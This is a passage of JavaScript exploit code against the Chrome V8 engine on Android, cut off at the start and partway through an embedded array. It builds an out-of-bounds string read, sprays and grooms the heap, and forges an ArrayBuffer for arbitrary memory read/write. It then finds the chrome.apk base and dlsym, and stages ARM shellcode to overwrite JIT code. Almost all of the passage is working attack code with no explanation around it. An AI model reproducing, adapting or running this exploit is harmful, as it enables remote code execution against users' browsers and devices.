intarray_to_double(int_arr){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n uBuf[0]=int_arr[0];\r\n uBuf[1]=int_arr[1];\r\n return dBuf[0];\r\n}\r\n \r\nfunction str_to_double(str){//leng of str must be 8\r\n var dBuf = new Float64Array(1);\r\n var u8Buf = new Uint8Array(dBuf.buffer);\r\n for(var i=0;i<str.length;i++){\r\n u8Buf[i] = str.charCodeAt(i);\r\n }\r\n return dBuf[0];\r\n}\r\nfunction double_to_array(value){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n dBuf[0]=value;\r\n return uBuf;\r\n}\r\n \r\nfunction gc(){\r\n for(var i=0;i<0x100000/16;i++){\r\n new String;\r\n }\r\n}\r\nfunction getHiddenValue(){\r\n var obj = {};\r\n var oob = \"/re/\";\r\n //oob = oob.replace(\"re\",\"*\".repeat(0x2000));\r\n oob = oob.replace(\"re\",\"*\".repeat(0x100000));\r\n var str = 'class x extends Array{'+oob+\"}\";\r\n var fun = eval(str);\r\n Object.assign(obj,fun);\r\n return obj;\r\n}\r\nvar obWin;\r\nfunction makeOobString(){\r\n var hiddenValue = getHiddenValue();\r\n var magicStr = \"bbbb\";\r\n var arr=[];\r\n var str = 'class x extends Array{}';\r\n for(var i=0;i<str.length;i++){\r\n arr[i]=str.charCodeAt(i);\r\n }\r\n var ob = new Array(0x200);\r\n ob.fill(0x31313131);\r\n gc();\r\n gc();\r\n str=String.fromCharCode.apply(null,arr);\r\n ob=ob.concat(0x32323232);\r\n var fun = eval(str); \r\n ob[2]=str;\r\n ob[3]=ob;\r\n Object.assign(fun,hiddenValue);\r\n var oobString = fun.toString();\r\n gc();\r\n gc();\r\n print(\"begin search\");\r\n var subStr = oobString.substr(0,0x8000);\r\n var pos = subStr.indexOf(magicStr);\r\n print(\"end search\");\r\n if(pos==-1){\r\n print(\"find magic failed\");\r\n postMessage(false);\r\n self.close();\r\n print(\"unpossible\");\r\n throw \"error\";\r\n }else{\r\n print(\"find magic at \"+pos);\r\n \r\n }\r\n oobString = oobString.substr(pos,ob.length*4);\r\n obWin=ob;\r\n return oobString;\r\n}\r\nvar oobString = makeOobString();\r\nprint(\"get oob string successfully\");\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n /*document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");*/\r\n}\r\nfunction str2arr(str,len){//len must be multile of 4\r\n if(len===undefined)\r\n len = str.length;\r\n var u8a = new Uint8Array(len);\r\n for(var i=0;i<len;i++){\r\n u8a[i] = str.charCodeAt(i);\r\n }\r\n return new Uint32Array(u8a.buffer);\r\n}\r\nfunction pArrayInHex(arr){\r\n var result=\"<p style='font-size:8px'>\";\r\n for(var i=0;i<arr.length;i++){\r\n result+=(arr[i]+0x100000000).toString(16).substr(-8);\r\n result+=\" \";\r\n if(i%8==7)\r\n result+=\"<p style='font-size:8px'>\";\r\n }\r\n result+=\"<p>\";\r\n print(result);\r\n //alert(result);\r\n return result;\r\n}\r\nfunction pStrInHex(str){\r\n //var result=\"<p style='font-size:8px'>\";\r\n var result=\"\\n\";\r\n for(var i=0;i<str.length;i++){\r\n var code = str.charCodeAt(i);\r\n result+=(code+0x100).toString(16).substr(-2);\r\n if(i%4==3)\r\n result+=\" \";\r\n if(i%32==31)\r\n // result+=\"<p style='font-size:8px'>\";\r\n result+=\"\\n\";\r\n }\r\n // result+=\"<p>\";\r\n result+=\"\\n\";\r\n print(result);\r\n return result;\r\n}\r\nfunction getObjAddr(obj){\r\n obWin[0]=obj;\r\n var value2= ((str2arr(oobString,4))[0]);\r\n return value2>>>0;\r\n}\r\n \r\nvar getObj24BitsAddr = function(){\r\n var smi=0;\r\n var code = 0;\r\n var i=0;\r\n //don't allocate heap object\r\n function getAddr(obj){\r\n obWin[0]=obj;\r\n value=0;\r\n code = 0;\r\n i=0;\r\n for(i=2;i>=0;i--){\r\n code = oobString.charCodeAt(i);\r\n value = code+value*256;\r\n }\r\n return value;\r\n }\r\n return getAddr;\r\n}();\r\n \r\n \r\nvar lengthInOldSpace = 0xfffffffc;\r\nvar abarr=new Array(800);\r\nfunction sprayVM(){\r\n var i=0;\r\n var j=0;\r\n try{\r\n for(i=0;i<20;i++){\r\n var u8 = new Uint8Array(0x10000000-0x500);\r\n abarr[i]=u8;\r\n }\r\n }catch(e){}\r\n try{\r\n for(j=0;j<100;j++){\r\n var u8 = new Uint8Array(0x8000000-0x500);\r\n abarr[i+j]=u8;\r\n }\r\n }catch(e){}\r\n print(\"allocate \"+i+\" 256M \"+j+\" 16M \")\r\n function getRandomInt(min, max) {\r\n min = Math.ceil(min);\r\n max = Math.floor(max);\r\n return Math.floor(Math.random() * (max - min)) + min;\r\n }\r\n delete abarr[getRandomInt(0,i)];\r\n}\r\n \r\n \r\nfunction getNewSpaceAddrs(){\r\n /*var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";*/\r\n var objsInNewSpace = new Array(80);\r\n for(var i=0;i<objsInNewSpace.length;i++){\r\n //var xx=escape(str);\r\n var xx = new Array(0x70000/4);\r\n objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;\r\n //\u4f7fnewspace\u66f4\u79bb\u6563\r\n new Uint8Array(0x100000-0x500);\r\n new Uint8Array(0x100000-0x500);\r\n }\r\n function compareNumbers(a, b) {\r\n return a - b;\r\n }\r\n objsInNewSpace = Array.from(new Set(objsInNewSpace));\r\n objsInNewSpace = objsInNewSpace.sort(compareNumbers);\r\n return objsInNewSpace;\r\n}\r\n \r\n \r\nprint(\"begin get new space address\");\r\nvar objsInNewSpace = getNewSpaceAddrs();\r\nwhile(objsInNewSpace.length<16){\r\n objsInNewSpace = getNewSpaceAddrs();\r\n print(\"new space addresses\");\r\n pArrayInHex(objsInNewSpace);\r\n}\r\n \r\ntry{\r\nsprayVM();\r\n}catch(e){}\r\n \r\nvar selectedTrunk = 0;\r\nvar selectedStr = \"\";\r\nfunction bruteForceFengShui(){\r\n var huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000\r\n huge_str +=\"%\";\r\n var hold = new Array(100);\r\n //var holdaddress = new Array(100);\r\n for(var i=0;;i++){\r\n var large = escape(huge_str);\r\n var addr = getObjAddr(large);\r\n //console.log(addr.toString(16) + \" \"+i);\r\n if(i<hold.length){\r\n hold[i]=large;\r\n //holdaddress[i]=addr;\r\n }\r\n addr=(addr&0xfff00000)>>>0;\r\n addr = addr-0x100000;\r\n if(objsInNewSpace.indexOf(addr)!=-1){\r\n selectedTrunk = addr;\r\n selectedStr = large;\r\n abarr.fill(1);\r\n hold.fill(1);\r\n //holdaddress.fill(1);\r\n break;\r\n }\r\n if(i===150){\r\n /*i=0;\r\n print(\"tried 200 times\");\r\n abarr.fill(1);\r\n try{\r\n sprayVM();\r\n }catch(e){};*/\r\n postMessage(false);\r\n close();\r\n throw \"exceed limits\";\r\n }\r\n }\r\n}\r\nbruteForceFengShui();\r\n//to avoid allocate memory latter, initilize here\r\nvar nextTrunk = selectedTrunk + 0x100000;\r\n \r\n//\u751f\u6210\u4e00\u5757\u8db3\u591f\u5927\u7684\u53ef\u8bfb\u5199\u5185\u5b58\r\nvar huge_str = \"eval('');\";\r\n//8000\u4e0d\u80fd\u592a\u5927\uff0c\u592a\u5927\u4f1a\u4f7fnew_space\u589e\u5927\r\nfor(var i=0;i<8000;i++) huge_str += 'a.a;';\r\nhuge_str += \"return 10;\";\r\nvar huge_func = new Function('a',huge_str);\r\nhuge_func({});\r\n \r\nfunction fillNewSpace(origObj){\r\n //first object in new space at 0x8100, new spaces layout\r\n //0x40000\r\n //0x37f00\r\n //.....\r\n //0x40000\r\n var gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25\r\n var gap = gap+\"%\";\r\n //flat gap\r\n gap.substr(0,100);\r\n var fillstr = \"%20a\".repeat((0x40000-12)/4);\r\n fillstr = escape(fillstr);\r\n var addr=0;\r\n for(var i=0;i<0x100;i++){\r\n addr = getObj24BitsAddr(origObj);\r\n if((addr&0xfffff)===0x8101)\r\n origObj=escape(gap);\r\n else\r\n origObj=unescape(fillstr);\r\n }\r\n}\r\n \r\nfunction findNewSpace(){\r\n var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";\r\n for(var i=0;;i++){\r\n var xx=escape(str);\r\n var straddr = getObjAddr(xx);\r\n addr=(straddr&0xfff00000)>>>0;\r\n if(addr===selectedTrunk){\r\n print(\"good state \"+straddr.toString(16));\r\n break;\r\n }\r\n }\r\n}\r\n \r\nfunction myencode(str){\r\n var arr = [];\r\n for(var i=0;i<str.length;i++){\r\n if(i%2==1)\r\n arr.push(str.charCodeAt(i));\r\n else{\r\n arr.push(37);//%\r\n var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);\r\n arr.push(hexstr.charCodeAt(0));\r\n arr.push(hexstr.charCodeAt(1));\r\n }\r\n }\r\n return String.fromCharCode.apply(null,arr);\r\n}\r\n \r\nvar dArray = [];\r\nvar index = (0x8100-36)*2;\r\nfor(var i=0;i<0x20000/8;i++){\r\n dArray[i]=str_to_double(\"%03x%03x\");\r\n}\r\n \r\nvar occulen = 0;\r\nvar i = 0;\r\nvar savedChunk = new Uint8Array(0x8100);\r\nvar hiddenValue = getHiddenValue();\r\nvar arr=[];\r\nfillNewSpace(new String);\r\nfindNewSpace();\r\nvar classStr = 'class x extends Array{}';\r\nfor(var i=0;i<classStr.length;i++){\r\n arr[i]=classStr.charCodeAt(i);\r\n}\r\nvar magicStr = String.fromCharCode(0x86,0x24);\r\nclassStr=String.fromCharCode.apply(null,arr);\r\nvar ab = new ArrayBuffer(0x1243);\r\nvar fun = eval(classStr); \r\nObject.assign(fun,hiddenValue);\r\nvar oobStr = fun.toString();\r\n \r\n/*(gdb) x/20xw 0x5600c45c array buffer layout\r\n * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020\r\n * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000\r\n */\r\n//overwrite huge string as array buffer\r\nvar abLengthIndex = oobStr.indexOf(magicStr);\r\nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32);\r\n//replace the byteLength\r\nvar LengthAddr = getObjAddr(lengthInOldSpace);\r\nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);\r\nvar strBase = \"\\x00\\x00\\x00\\x00\";\r\nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);\r\nstrArrayBuffer = myencode(strArrayBuffer);\r\nfor(var i=0;i<strArrayBuffer.length/8;i++){\r\n var d = strArrayBuffer.substr(i*8,8);\r\n dArray[index/8+i] = str_to_double(d);\r\n}\r\n \r\nvar classStrAddr = getObjAddr(classStr)>>>0;\r\n//set read position\r\nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head\r\n//length control the length of unscaped string, generated string has 12 bytes head\r\n//left 0x1000*2 bytes to avoid gc\r\nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);\r\n \r\n//save the the chunk head to be corrupted\r\nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;\r\nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);\r\nfor(var i =0;i<savedThunkStr.length;i++){\r\n savedChunk[i] = savedThunkStr.charCodeAt(i);\r\n}\r\n \r\nvar pos1=new String;\r\nvar pos1addr = getObj24BitsAddr(pos1)-1;\r\n \r\n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \r\nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);\r\n//minus the length of double array\r\nif(occulen<0x40000+16+8)\r\n throw \"no enough room\";\r\nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray\r\nif(occulen%4!==0)\r\n throw \"length don't align\";\r\nvar arrocc=new Array((occulen/4)); \r\n//set unescape write position\r\nvar occDoubleArray = dArray.concat();\r\n \r\nvar b=unescape(subOobStr);\r\n//restore the corrupted chunk head\r\nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);\r\nfor(var i=0;i<savedChunk.length;i++){\r\n u8[i] = savedChunk[i];\r\n}\r\n \r\nprint(\"long string allocated at \"+classStrAddr.toString(16));\r\nif(typeof(selectedStr)===\"string\"){\r\n print(\"overwrite failed\");\r\n postMessage(false);\r\n close();\r\n return;\r\n //throw \"overwrite failed\";\r\n}\r\nvar fakeab = selectedStr;\r\nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16));\r\nvar globaldv = new Uint32Array(fakeab);\r\n \r\nfunction read_uint32(from_address){\r\n var u32 = globaldv[(from_address/4)>>>0];\r\n return u32>>>0;\r\n}\r\n \r\n \r\nfunction read_uint8(from_address){\r\n from_address = from_address>>>0;\r\n var index = (from_address/4)>>>0;\r\n var mask = from_address%4;\r\n var u32 = globaldv[index];\r\n u32 = u32<<8*(3-mask);\r\n return u32>>>24;\r\n}\r\n \r\nfunction read_uint32_unalign(from_address){\r\n var u32 = 0;\r\n for(var i=3;i>=0;i--){\r\n var u8 = read_uint8(from_address+i);\r\n u32 = u32*0x100+u8;\r\n }\r\n return u32>>>0;\r\n}\r\n \r\n//rw to execute\r\n//get function point of v8::internal::Accessors::ReconfigureToDataProperty\r\nfunction getFixedFunctionPoint(fakeab){\r\n var FunctionAddress = getObjAddr(Function);\r\n var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);\r\n var map = u32[0];\r\n u32 = new Uint32Array(fakeab,map-1,0x1000);\r\n //instance descriptors\r\n var descriptors = u32[7];\r\n u32 = new Uint32Array(fakeab,descriptors-1,0x1000);\r\n var lengthAccessorInfo = u32[6];\r\n u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);\r\n var setterForeign = u32[4];\r\n u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);\r\n var functionPoint = u32[1];\r\n return functionPoint-1;\r\n}\r\n \r\nvar funPoint = getFixedFunctionPoint(fakeab);\r\nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16));\r\nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval\r\n \r\nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000\r\nprint(\"chrome.apk base at \"+point.toString(16));\r\n \r\nfunction find(startAddr,len,pattern){\r\n for(var i=0; i<(len-pattern.length); i++ ) {\r\n for(var j=0;j<pattern.length;j++){\r\n var temp = read_uint8(startAddr+i+j);\r\n //print(temp.toString(16));\r\n if(temp!=pattern[j]) break;\r\n }\r\n if(j==pattern.length) return startAddr+i;\r\n }\r\n print(\"find failed\");\r\n}\r\nvar pattern_position=find(point,0x10000000,pattern);\r\n \r\nprint(\"find pattern at \"+to_hex(pattern_position));\r\n \r\n \r\n \r\n \r\n \r\nfunction get_dest_from_blx(addr) {\r\n var val = read_uint32_unalign(addr);\r\n var s = (val & 0x400) >> 10;\r\n var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);\r\n var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);\r\n var i10h = val & 0x3ff;\r\n var i10l = (val & 0x7fe0000) >> 17;\r\n var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);\r\n return ((addr + 4) & ~3) + off;\r\n}\r\n \r\nfunction backup_original_code(start_address){\r\n var backup_arr = [];\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n backup_arr[i]=u8arr[i];\r\n }\r\n return backup_arr;\r\n}\r\n \r\nfunction restore_original_code(start_address,backup_arr){\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n u8arr[i]=backup_arr[i];\r\n }\r\n}\r\n \r\n \r\nhuge_func({});\r\nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4)));\r\nvar dlsym_addr = get_dest_from_blx(pattern_position-4);\r\nprint(\"dlsym address is \"+to_hex(dlsym_addr));\r\nvar huge_func_address = getObjAddr(huge_func)-1;\r\nprint(\"huge func address is \"+to_hex(huge_func_address));\r\nfor(var i=0;i<20;i++){\r\n print(to_hex(read_uint32(huge_func_address+i*4)));\r\n}\r\nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4\r\nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry));\r\nprint(to_hex(read_uint32(huge_func_code_entry)));\r\n \r\n//var so_str= \"\";\r\nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90